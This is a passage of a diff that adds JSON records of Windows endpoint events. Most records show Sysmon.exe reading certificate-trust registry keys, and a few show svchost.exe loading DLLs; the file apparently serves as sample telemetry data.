"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": 
"CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879330000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp110_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877930000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "netprofm.dll", + "image_path": "C:\\Windows\\System32\\netprofm.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878080000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software 
Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", 